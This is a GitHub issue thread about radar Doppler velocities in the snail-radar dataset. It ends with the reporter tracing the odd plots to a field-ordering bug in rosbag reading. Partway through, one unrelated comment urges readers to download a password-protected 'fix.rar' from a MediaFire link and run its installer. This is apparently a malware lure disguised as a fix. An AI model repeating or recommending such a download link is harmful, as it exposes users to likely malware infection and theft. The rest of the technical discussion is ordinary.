### ISSUE TITLE
Radar velocities

### ISSUE THREAD

**Issue by Dcasadoherraez** [snail-radar/dataset_tools#4]
Hello! 
Thanks again for the dataset!
I've been experimenting a bit with the velocities for all of the points within a scan.
There seems to be something unusual going on. 

This is the plot for the x-y radar scan. A random scan in one of the sequences. Everything seems ok:
![image](https://github.com/user-attachments/assets/6ec2c0b3-4e27-4338-ac1a-16dd4b658e2f)

Then I plot the velocities vs azimuth angle following
```
points = dataloader[80]
calib = dataloader.radar_calibration
points_body = transform_doppler_points(calib, points)

thetas = np.arctan2(points_body[:, 1], points_body[:, 0])
velocities = points_body[:, 4]

plt.scatter(thetas, velocities, s=1)
plt.xlabel("theta")
plt.ylabel("Doppler v.")
plt.show()

```

The results don't seem to follow a sinusoidal curve as it's common with the radar velocity readings:
![image](https://github.com/user-attachments/assets/e84f2b72-3ed6-445d-b7e6-58c106853e49)

Meanwhile, using a different radar dataset, specifically the one provided in "4D Radar-Based Pose Graph SLAM With Ego-Velocity Pre-Integration Factor", the velocity curve is clearly visible:
![image](https://github.com/user-attachments/assets/4230a7fb-3d19-4d74-aec0-2d86889dab19)

I believe it may be because of the radars being used. However, the Oculii should return the correct velocity profile of the measured points if I'm not wrong. Is there something I am missing?

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dcasadoherraez** [comment]
Issue is not yet resolved

**Comment by JzHuai0108** [comment]
I am not sure about this rule that the radar points "follow a sinusoidal curve as it's common with the radar velocity readings".

Is there any intuitive explanation for this rule?

What type of radar sensor is used in that radar dataset?

As an aside, I actually ran the GNC (similar to iterated least squares) to solve ego velocities for 3 radar point cloud topics (oculii enhanced pcl, oculii pcl, and ars548) across all sequences. I did not see any anomalies in the ego velocities.

**Comment by Dcasadoherraez** [comment]
This is the curve I'm referring to. The ego-vehicle's velocity profile:
D. Kellner, M. Barjenbruch, J. Klappstein, J. Dickmann and K. Dietmayer, "Instantaneous ego-motion estimation using Doppler radar," 16th International IEEE Conference on Intelligent Transportation Systems (ITSC 2013), The Hague, Netherlands, 2013, pp. 869-874, doi: 10.1109/ITSC.2013.6728341.

![image](https://github.com/user-attachments/assets/6545d91c-6265-4c20-a033-beebdcf6ff23)

I will try to run least squares again and see how it goes. Would be cool if you provided the reference to the GNC paper/code.

Thankssss!

**Comment by JzHuai0108** [comment]
A good reference is [here](https://github.com/christopherdoer/reve). I compared GNC and the IRLS over there, they gave very close results.

**Comment by JzHuai0108** [comment]
I think the phenomenon relies on several assumptions, including: a, low scene dynamics, b, low vertical fov, possibly 3D radar (XY + Doppler). In a scene with large height variations (say trees and buildings), a 4D radar of relatively large vertical FOV (say >=30deg) will not likely show that pattern.

[1] probably uses a 3D radar,
[2] uses a Z+F 4D radar of 30deg vertical FOV.
Our dataset uses an ARS548 of 40deg vertical FOV, and an Oculii Eagle of 45deg vertical FOV.
 

[1] D. Kellner, M. Barjenbruch, J. Klappstein, J. Dickmann and K. Dietmayer, "Instantaneous ego-motion estimation using Doppler radar," 16th International IEEE Conference on Intelligent Transportation Systems (ITSC 2013), The Hague, Netherlands, 2013, pp. 869-874, doi: 10.1109/ITSC.2013.6728341.

[2] "4D Radar-Based Pose Graph SLAM With Ego-Velocity Pre-Integration Factor"

**Comment by Dcasadoherraez** [comment]
The picture I showed from the dataset in "4D Radar-Based Pose Graph SLAM With Ego-Velocity Pre-Integration Factor" comes from a ZF Radar with the specs:
![image](https://github.com/user-attachments/assets/15bb7e6a-2463-4275-ac8e-8f576136c041)

The scene is 3D, with trees and buildings. And the elements in the scene are static as well as dynamic.

Even if the FOV is higher on the Oculii, intuitively it makes sense that the same pattern is followed. The car will have the velocities of the points moving towards it. The radar provides the projection of the velocity of the points into the radial direction. Those points in front will have maximum velocity, where the azimuth is 0, those where azimuth is 90deg (theoretically), the velocity will be zero. 

I'll continue investigating what's the cause :) 

Also I haven't really tried the ARS548 because there are so many calibrations for the different sequences that it's a bit of a pain.

"Radar-Only Odometry and Mapping for Autonomous Vehicles"
![image](https://github.com/user-attachments/assets/9a74fc1a-ceee-44a2-b99d-5ddaa7e19e9d)

"Instantaneous Ego-Motion Estimation using Doppler Radar"
![image](https://github.com/user-attachments/assets/c6dee5d5-c7fb-47ca-979f-4a157a23d624)

**Comment by Dcasadoherraez** [comment]
Actually, if the car is moving in the horizontal plane, the projection of the velocity of the objects (trees, buildings...) in the radial direction will be zero for the vertical-z component. So the velocity of a point will only depend on the planar vx,vy components. 
Thus the pattern should still hold.

**Comment by Dcasadoherraez** [comment]
Okay. I figured out the mistake. I was right that the pattern should be followed, but there was a bug in my code not showing it correctly.
The problem was how I was reading the data from the rosbag. 
Using read_points does not return the points following the order in field_names, so the plot that I was showing was actually the "Power" values, not the "Doppler.
```
        for p in pc2.read_points(cloud_msg, field_names=("x", "y", "z", "Doppler", "Power"), skip_nans=True):
            points.append([p[0], p[1], p[2], p[3], p[4]])
```
This is how it looks like for the Oculii
![image](https://github.com/user-attachments/assets/720c43c0-7a91-4522-a9ca-f8b4aa056d27)

And this is how it looks like for the ARS548
![image](https://github.com/user-attachments/assets/761b2b5e-a27b-4f25-857d-af88fa2113db)

Thanks so much for your patience :D

At least we all learnt something from it

**Comment by JzHuai0108** [comment]
I am happy for you. I understand this line, "Actually, if the car is moving in the horizontal plane, the projection of the velocity of the objects (trees, buildings...) in the radial direction will be zero for the vertical-z component. So the velocity of a point will only depend on the planar vx,vy components.", but I think the pattern will be less obvious for high vertical FOV radars. After all, we should watch out for some premature interpretations made by tardy people like me :).
